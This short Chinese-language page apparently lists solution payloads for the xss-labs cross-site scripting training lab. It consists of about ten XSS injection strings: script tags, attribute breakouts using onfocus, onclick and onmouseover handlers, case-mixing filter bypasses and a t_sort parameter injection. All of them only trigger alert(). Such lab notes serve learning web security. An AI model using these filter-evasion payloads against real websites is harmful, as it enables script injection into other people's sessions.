xss-labs过关payload
<script>alert('xss')</script>
"><script>alert('xss')</script>//
?keyword='onfocus=javascript:alert('xss') > //&submit=搜索
"onclick="alert(/xss/)
"><a href='javascript:alert(/xss/)'>
" Onmouseover="alert(/xss/)
" oONnmouseover="alert(/xss/)
javascRipt:alert(/xss/)
javascRipt:alert('http://xss')
?keyword=<script>alert('xss')</script>&t_sort=" type="text" onclick="alert('xss')
浙公网安备 33010602011771号